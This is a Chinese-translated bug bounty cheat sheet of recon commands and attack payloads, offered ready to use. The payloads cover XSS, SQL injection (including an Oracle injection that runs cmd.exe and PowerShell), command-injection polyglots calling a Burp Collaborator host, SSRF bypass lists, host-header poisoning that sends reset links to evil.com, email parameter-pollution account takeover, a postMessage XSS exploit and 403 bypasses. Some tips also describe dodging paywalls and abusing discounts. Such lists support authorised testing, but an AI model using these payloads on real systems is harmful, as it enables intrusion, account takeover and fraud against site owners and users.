漏洞赏金的一些小Tips

项目地址

https://github.com/punishell/bbtips

漏洞赏金技巧

#bugbountytips 来自 twitter 和我的 bash-jutsu 的集合。

侦察

Google the company copyright footer to get more domains.
Use whoxy.com to perform reverse whois lookups with the email used to register the main domain/
Search for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints.
Use OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains.
Try to recreate data from deleted accounts by siging up with the old email address.
Check text version of HTML e-mail for template injections
When testing Rails Application add .json to url endpoints.
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/

子域枚举

sublist3r -d $1 -o $1.txt
mkdir thirdlevel
echo "Gathering full third-level domain with sublister"
for domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done
echo "Probing for alive third-levels..."
cat final.txt | httprobe > probed.txt

子域级别提取

正则表达式模式 域级别匹配
grep -P ‘^(?:[a-z0-9]+.){1}[^.]*$’ 仅限二级域名
grep -P ‘^(?:[a-z0-9]+.){2}[^.]*$’ 仅限三级域名
grep -P ‘^(?:[a-z0-9]+.){2,}[^.]*$’ 三级域名或更高
grep -P ‘^(?:[a-z0-9]+.){2,3}[^.]*$’ 仅 3 至 4 级域
grep -P ‘^(?:[a-z0-9]+.){3,}[^.]*$’ 4 级域名或更高级别

现场查看

cat GREPABLENMAP.gnmap | grep 443/open | cut -d "(" -f 1 | cut -d : -f 2| tr -d " " | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew

从 sublis3r 检查 live webapps

cat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew

过滤ffuf输出

cat * | jq | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl"  | grep -v "FUZZ" | cut -d \" -f4

工具

Use exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators
Use cloud_enum to find open google buckets or azure accounts
Use Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+'
Use WayBackmachine combined with paraminer or parameth
Passive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey

有效载荷

Inject payloads in parameter names, ?<script>alerty</script>=true
Use youtube(olx, etc...) videos with xss in names.
Use round brackets to inject payload into valid e-mail address.
X-Forwarded-For: ${payload}
Use longstring parameters for stacktrace.
WAFBYPASS ?page=";confirm`1`//   Rightwards -> 302; ?pag%65=";confirm`1`//   Rightwards -> 200 + XSS!
Redirect bypass %26next=http://example.com
When testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path
Add [] to name of parrameter: pwd= ->pwd[]=
when interacting with db try to put % in parameter  ?item=%

身份验证和授权

UUID Idor Trick, Register user with the same name, it maybe return uuid.
Try to bruteforce login endpoint. /login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo
403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200,
Bypass paywalls by using Google Bot user agent.
User securitytrails.com to find the originating server IP
Do match and replace form false to true.
Set your birthday for today ot tomorrow to get discounts.
Skip steps: /step/shipping ->  ~~/step/payment~~ -> /step/confirm
Check does blackfriday coupon codes expires.
Use blind xss as password.
Login to site using Facebook and try tochange userid during POST requests
/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200

电子邮件限制绕过

inti(;inti@inti.io;)@whitelisted.com

→ inti(;
→ inti@inti.io → my inbox!
→ ;)@whitelisted.com
● inti@inti.io(@whitelisted.com)
● inti+(@whitelisted.com;)@inti.io

电子邮件地址输入模糊

test+(<script>alert(1)</script>)@example.com
test@example(<script>alert(1)</script>).com
"<script>alert(1)</script>"@example.com

"<%=7*7%>"@example.com
test+(${{7*7}})@example.com

"'OR 1=1--"@example.com
"mail');DROP TABLE users;--"@example.com

test@example.burpcollaborator.net
test@[127.0.0.1]

victim&email=attacker@example.com

"%0d%0aContent-Lenght:%200@0d%0a%0d%0a"@example.com"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

通过电子邮件接管帐户

GET /passwordreset

Double parameter (aka. HPP / HTTP parameter pollution):
email=victim@xyz.tld&email=hacker@xyz.tld
Carbon copy:
email=victim@xyz.tld%0a%0dcc:hacker@xyz.tld
Using separators:
email=victim@xyz.tld,hacker@xyz.tld
email=victim@xyz.tld%20hacker@xyz.tld
email=victim@xyz.tld|hacker@xyz.tld
No domain:
email=victim
No TLD (Top Level Domain):
email=victim@xyz
JSON table:
{"email":["victim@xyz.tld","hacker@xyz.tld"]}

重设密码:

reset userpassword: user@email.com.burpcolaborator.com

在 example.com 中查找 GET 参数

assetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

命令注入多语言

/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'"||ping -c 2 example.com||"/*`*/
/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'"||echo 1 >/tmp/rce1||"/*`*/
|echo lol2137||a #' |echo lol2137||a #|" |echo lol2137||a #
||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net
||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net
$(sleep 21)

本地主机 (127.0.0.1) 的 SSRF 绕过列表:

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

前 25 个 SSRF 参数

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

前 25 个 RCE 参数

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

前 25 个 LFI 参数

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

HackerOne 重定向参数

/[redirect]
?targetOrigin=[redirect]
?fallback=[redirect]
?query=[redirect]
?redirection_url=[redirect]
?next=[redirect]
?ref_url=[redirect]
?state=[redirect]
?l=[redirect]
?redirect_uri=[redirect]
?forum_reg=[redirect]
?return_to=[redirect]
?redirect_url=[redirect]
?return_url=[redirect]
?host=[redirect]
?url=[redirect]
?redirectto=[redirect]
?return=[redirect]
?prejoin_data=[redirect]
?callback_url=[redirect]
?path=[redirect]
?authorize_callback=[redirect]
?email=[redirect]
?origin=[redirect]
?continue=[redirect]
?domain_name=[redirect]
?redir=[redirect]
?wp_http_referer=[redirect]
?endpoint=[redirect]
?shop=[redirect]
?qpt_question_url=[redirect]
?checkout_url=[redirect]
?ref_url=[redirect]
?redirect_to=[redirect]
?succUrl=[redirect]
?file=[redirect]
?link=[redirect]
?referrer=[redirect]
?recipient=[redirect]
?redirect=[redirect]
?u=[redirect]
?hostname=[redirect]
?returnTo=[redirect]
?return_path=[redirect]
?image=[redirect]
?requestTokenAndRedirect=[redirect]
?retURL=[redirect]
?next_url=[redirect]

更多参数

https://github.com/1ndianl33t/Gf-Patterns

大规模XSS

#!/bin/bash
# $1 => example.domain

subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1

cat domains_subfinder_$1 | tee -a domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt

cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt

大规模顶级参数搜索

TBA
echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

多汁的 GoogleDorks

site:example.com inurl:.cgi?

文件上传和搜索内容

ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE

文件上传链

../../../tmp/lol.png —> for path traversal
sleep(10)-- -.jpg —> for SQL injection
<svg onload=alert(document.domain)>.jpg/png —> for XSS
; sleep 10; —> for command injections

在 Target.com 中查找 JavaScript 文件

echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
or
cat domains | httpx -silent | subjs | anew

从 *.js 中提取端点

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

从js中提取多汁数据

cat hosts | httpx -silent | subjs | anew | httpx -silent -sr -mc 200
grep -EHirn "accesskey|admn|aes|api_key|apikey|password|secret|token" ./output --color

403绕过

https://target.com/admin/ –> HTTP 302 (redirect to login page)
https://target.com/admin..;/ –> HTTP 200 OK

https://target.com/../admin
https://target.com/whatever/..;/admin

site.com/secret –> HTTP 403 Forbidden
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#

通过 .json 泄露数据

Here’s a tip to achieve sensitive data leak using .json extension.

Request:
GET /ResetPassword HTTP/1.1
{"email":"victim@example.com"}

Response:
HTTP/1.1 200 OK
Now let’s try this instead:

Request:
GET /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}

Response:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}

为目标生成词表

echo "bugcrowd.com" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew

检查 SQLi

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'  <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

电子邮件参数中的 SQLi

Payload 响应 注入状态
{“email”:”asd@a.com”} {“code”:2002,”status”:200,”message”:”Email not found.”} Valid
{“email”:”asd a@a.com”} {“code”:2002,”status”:200,”message”:”Bad format”} Not Valid
{“email”:”\”asd a\”@a.com”} {“code”:2002,”status”:200,”message”:”Bad format”} Not Valid
{“email”:”asd(a)@a.com”} {“code”:2002,”status”:200,”message”:”Bad format”} Not Valid
{“email”:”\”asd(a)\”@a.com”} {“code”:2002,”status”:200,”message”:”Email not found.”} Valid
{“email”:”asd’a@a.com”} {“code”:0,”status”:500,”message”:”Unspecified error”} Not Valid
{“email”:”asd’or’1’=’1@a.com”} {“code”:2002,”status”:200,”message”:”Email not found.”} Valid  
{“email”:”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1@a.com”} {“code”:2002,”status”:200,”message”:”Bad format”} Not Valid
{“email”:”\”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1\”@a.com”} {“code”:0,”status”:200,”message”:”Successful”} Valid Delay: 7,854 milis
{“email”:”\”a’-IF(LENGTH(database())=10,SLEEP(7),0)or’1’=’1\”@a.com”} {“code”:0,”status”:200,”message”:”Successful”} Valid Delay: 8,696 milis
{“email”:”\”a’-IF(LENGTH(database())=11,SLEEP(7),0)or’1’=’1\”@a.com”} {“code”:0,”status”:200,”message”:”Successful”} Valid No delay

Oracle

1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --
1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null  FROM DUAL --
1' AND 1=1 UNION SELECT null, user FROM DUAL --

酷打嗝插件

Autorize – To test BACs (Broken Access Control)
Burp Bounty – Profile-based scanner
Active Scan++ – Add more power to Burp’s Active Scanner
AuthMatrix – Authorization/PrivEsc checks
Broken Link Hijacking – For BLH (Broken Link Hijacking)
Collaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)
Command Injection Attacker
Content-Type Converter – Trying to bypass certain restrictions by changing Content-Type
Decoder Improved – More decoder features
Freddy – Deserialization
Flow – Better HTTP history
Hackvertor – Handy type conversion
HTTP Request Smuggler
Hunt – Potential vuln identifier
InQL – GraphQL Introspection testing
J2EE Scan – Scanning J2EE apps
JSON/JS Beautifier
JSON Web Token Attacker
ParamMiner – Mine hidden parameters
Reflected File Download Checker
Reflected Parameter – Potential reflection
SAML Raider – SAML testing
Upload Scanner – File upload tester
Web Cache Deception Scanner

通过 favico 检测框架

cat urls.txt | python3 favfreak.py -o output

密码中毒

(1) Normal request:

Request:
POST /password-reset?user=123 HTTP/1.1
Host: target.com
Link received:
https://target.com/reset-link=1g2f3guy23g
(2) Basic HHI (Host Header Injection):

Request:
POST /password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
none
Error 404 - request blocked
(3) Bypass technique:

Request:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com
Link received:
https://evil.com/reset-link=1g2f3guy23g

查找给定 IP 的主机名形式

echo 192.168.69.69 | cero

XSS 发布消息 POC

Vulnerable PostMessage
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>
window.addEventListener("message", (event) => {
console.log(event.data);
$(event.data)
}, false);
</script>

Exploit
<!DOCTYPE html>
<html>
    <head>
    </head>
<body>
<script>
var myWindow = window.open("http://example.com/test.html")
</script>
<script>
setInterval(function(){myWindow.postMessage("<img src=x onerror=alert(123);>","*");},3000);
window.onmessage = function (e) {
console.log(e);
};
</script>
</body>
</html>

反序列化

https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://github.com/tyranid/ExploitRemotingService
https://github.com/nccgroup/VulnerableDotNetHTTPRemoting
https://github.com/pwntester/ysoserial.net/blob/master/README.md
https://nickbloor.co.uk/2018/02/28/popping-wordpress/

Asp.NET MVC 应用程序中从路径遍历到源代码

https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html
Exploiting Deserialisation in ASP.NET via ViewState
http://bit.ly/2NDZc73

入侵 IIS

https://www.youtube.com/watch?v=HrJW6Y9kHC4

从 web-archive 获取端点

cat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau

CLI 黑客备忘单

从实时主机获取 JS

cat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js
cat hosts.httprobe | gau | tee -a hosts.httprobe.gau
cat hosts.httprobe.gau |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\.js'|grep -ivE '\.json'|sort -u
cat hosts.httprobe.js | sort -u >> hosts.httprobe.js.sorted
cat hosts.httprobe.js.sorted|cut -d \? -f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200
cat hosts.httprobe.js.sorted.200 |  httpx -silent -sr -mc 200

搜索 RXSS

cat hosts.httprobe | gau | tee -a hosts.httprobe.gau
cat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl
cat hosts.httprobe.gau.unfurl  | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200
cat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox

获取具有潜在可破解参数的端点

cat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a  hosts.httprobe.gau
cat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext
for i in `cat hosts.httprobe.gau.unfurl.ext`; do  grep $i hosts.httprobe.gau | grep \? | head -n1  | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done
cat hosts.httprobe.gau.unfurl.cgi.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.cgi.filtred.200

暴力破解多汁端点

for i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done
for i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl"  | grep -v "FUZZ" | cut -d \" -f4 >> qh-urls.txt;done

随机的

https://regex-generator.olafneumann.org/
https://regex101.com/

参考

 

请登录后发表评论